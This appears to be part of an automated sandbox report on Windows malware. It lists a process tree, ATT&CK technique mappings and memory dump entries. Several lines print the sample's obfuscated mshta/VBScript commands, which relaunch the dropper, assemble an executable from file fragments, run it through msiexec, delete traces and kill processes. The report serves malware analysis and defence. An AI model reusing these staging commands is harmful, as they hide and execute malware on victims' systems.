                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                  PID:7516
                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                  PID:8108
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                  PID:7796
                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                  PID:4152
                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                  PID:7780
                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:5484
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Modifies system executable filetype association
                                                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                    PID:4816
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      PID:8708
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:8484
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B158.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B158.exe
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:8896
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT ( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\B158.exe"" > ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF """" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\B158.exe"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ) )
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                          PID:4436
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\B158.exe"> ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\B158.exe") do taskkill -iM "%~Nxq" -f
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:8880
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE
                                                                                                                                                                                                                                                                                                                                ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:2872
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT ( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"" > ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF ""/PvqsV6~7fsyUR14GhQkS4jjgPQTPw"" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ) )
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                      PID:4276
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"> ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "/PvqsV6~7fsyUR14GhQkS4jjgPQTPw" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE") do taskkill -iM "%~Nxq" -f
                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                          PID:9060
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vBsCripT: ClOSe ( creAteObJecT ( "WscrIpT.sheLl" ). RUN ( "cmd /q /c ECho %tImE%4u> VDn3614.Q9 & ECho | SET /p = ""MZ"" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G + TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z & STaRt msiexec -y ..\UFTH.2~Z & deL /q * " , 0 , tRUe ) )
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:1944
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /q /c ECho %tImE%4u> VDn3614.Q9 & ECho | SET /p = "MZ" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G+ TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z & STaRt msiexec -y ..\UFTH.2~Z & deL /q *
                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                              PID:3068
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" ECho "
                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1728
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>WSyZI.4"
                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4636
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                    msiexec -y ..\UFTH.2~Z
                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6324
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                taskkill -iM "B158.exe" -f
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                PID:204
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\B3F9.exe
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\B3F9.exe
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:8672
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                            PID:8836
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                            PID:6032
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                            PID:4888
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:3984
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                              PID:7352
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                              PID:5492
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:9084
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1864
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:3492
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:8680
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:5920
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                        PID:5484
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:8004

                                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                                                                        Initial Access

                                                                                                                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1197

                                                                                                                                                                                                                                                                                                                                                        Change Default File Association

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1042

                                                                                                                                                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1197

                                                                                                                                                                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1089

                                                                                                                                                                                                                                                                                                                                                        File and Directory Permissions Modification

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1222

                                                                                                                                                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1130

                                                                                                                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                                                                                                                        5
                                                                                                                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                                        T1081

                                                                                                                                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                        T1120

                                                                                                                                                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                                                                                                                                                        Security Software Discovery

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1063

                                                                                                                                                                                                                                                                                                                                                        Software Discovery

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1518

                                                                                                                                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                                        Lateral Movement

                                                                                                                                                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                                                                                                                                                        Exfiltration

                                                                                                                                                                                                                                                                                                                                                        Impact

                                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                                        • memory/408-193-0x0000000000890000-0x00000000009DA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/408-179-0x0000000000400000-0x0000000000890000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          4.6MB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/408-170-0x0000000000B86000-0x0000000000BA2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          112KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/600-242-0x0000000000010000-0x0000000000011000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/600-260-0x0000000002380000-0x0000000002381000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/904-115-0x0000000006170000-0x00000000062BA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1092-356-0x0000000004E10000-0x0000000004E11000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1148-174-0x0000000140000000-0x0000000140C27000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          12.2MB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1148-177-0x0000000140000000-0x0000000140C27000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          12.2MB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1148-445-0x0000000140000000-0x0000000140C27000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          12.2MB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1148-191-0x0000000140000000-0x0000000140C27000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          12.2MB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1348-168-0x0000000000926000-0x000000000098E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          416KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1348-199-0x0000000000C20000-0x0000000000CB3000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          588KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1436-222-0x0000000005EA0000-0x0000000005EA1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1436-266-0x00000000057D0000-0x000000000581C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1436-185-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1436-220-0x00000000056A0000-0x00000000056A1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1436-221-0x0000000005990000-0x0000000005991000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1436-223-0x00000000017F0000-0x00000000017F1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1584-501-0x0000000002F50000-0x0000000002F66000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          88KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1584-243-0x0000000000FE0000-0x0000000000FF6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          88KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1600-230-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1600-295-0x0000000005BC0000-0x0000000005BC1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1600-204-0x00000000773E0000-0x000000007756E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1644-171-0x0000000000580000-0x0000000000581000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1644-195-0x000000001C530000-0x000000001C692000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          1.4MB

                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                        • memory/1644-211-0x000000001C6A0000-0x000000001C778000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                          864KB

                                                                                                                                                                                                                                                                                                                                                          Download

